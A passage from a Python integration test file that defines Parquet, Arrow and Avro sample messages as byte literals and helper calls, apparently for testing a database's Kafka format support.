5\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\
x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one Avro file per message,
# because of the nature of Avro: blocks simply follow one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\
x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04